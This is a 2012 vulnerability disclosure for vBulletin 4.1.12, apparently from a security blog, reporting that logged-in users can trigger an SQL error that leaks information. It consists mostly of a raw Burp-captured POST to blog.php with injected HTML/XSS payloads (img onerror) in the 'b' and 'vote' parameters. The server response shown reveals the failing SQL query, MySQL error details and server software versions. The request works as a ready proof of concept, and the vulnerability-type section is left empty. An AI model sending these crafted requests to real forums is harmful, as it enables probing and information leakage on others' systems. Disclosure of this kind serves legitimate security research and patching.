[ TITLE ....... ][ vBulletin 4.1.12 - sql information leak (for logged-in users)
[ DATE ........ ][ 03.05.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?


[--------------------------------------------[
[ 3. Where is bug :)

--- raw from burp ---
---raw-from-Burp---
POST /www/22o4/highz/las/blog.php?b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml] HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html

Cookie: skimlinks_enabled=1; vbulletin_userlist_hide_avatars_buddylist=0; editor_height=cms_article%23207px; bb_lastvisit=1335789702; bb_lastactivity=0; bb_sessionhash=bcf4631bc0ea002087ded92c796ac79a; bb_userstyleid=1; bb_skipmobilestyle=0; bb_thread_lastview=7aeffb9e62242afd6746ab9c8bcb589269ddf416a-1-%7Bi-121_i-1335789759_%7D; bb_forum_view=0ca42d3e5b599ba0a771e794d5098040cf6497cba-3-%7Bi-3_i-1335862432_i-2_i-1336034464_i-1_i-1336034445_%7D; bb_calendar=e2e67b4d0ec6ed855d66d62b21910a6cf6af50d6a-3-%7Bs-7-.calyear._i-2012_s-8-.calmonth._i-5_s-8-.calview1._s-12-.displaymonth._%7D; bb_blog_lastview=47cf4ac63a62d3c29c6a536323fa891bc5b8cd46a-1-%7Bi-2_i-1336037033_%7D

Pragma: no-cache

Cache-Control: no-cache

Content-Length: 630

Connection: close



ajax=1&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&do=rate&b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&

---and-HTTP-answer---

HTTP/1.1 200 OK

Date: Thu, 03 May 2012 09:26:51 GMT

Server: Apache/2.2.17 (Ubuntu)

X-Powered-By: PHP/5.3.5-1ubuntu7.7

Vary: Accept-Encoding

Connection: close

Content-Type: text/xml; charset=windows-1252

X-Pad: avoid browser bug

Content-Length: 1650



<?xml version="1.0" encoding="windows-1252"?>
<errors>
	<error><![CDATA[<p>Database Error</p>]]></error>
	<error_html><![CDATA[<p>Database error in vBulletin 4.1.12 Beta 1</p>
<p>Invalid SQL:



		REPLACE INTO blog_visitor

			(userid, visitorid, dateline, day, visible)

		VALUES

			(

				,

				2,

				1336037212,

				1335909600,

				1

			);<p>
<p>
<strong>MySQL Error</strong>   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '

				2,

				1336037212,

				1335909600,

				1

			)' at line 5<br />
<strong>Error Number</strong>  : 1064<br />
<strong>Request Date</strong>  : Thursday, May 3rd 2012 @ 11:26:52 AM<br />
<strong>Error Date</strong>    : Thursday, May 3rd 2012 @ 11:26:56 AM<br />
<strong>Script</strong>        : http://localhost/www/22o4/highz/las/blog.php?b=[%2fhtml][html]&quot;%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]&quot;%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]&quot;%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]&quot;%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]&quot;%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]&quot;%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]<br />
<strong>Referrer</strong>      : http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html<br />
<strong>Classname</strong>     : vB_Database<br />
<strong>MySQL Version</strong> : <br />
</p>]]></error_html>
</errors>


---raw-from-Burp---
---

Enjoy ;)
[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Questions? Mail me.
]
[ Cheers! o/
[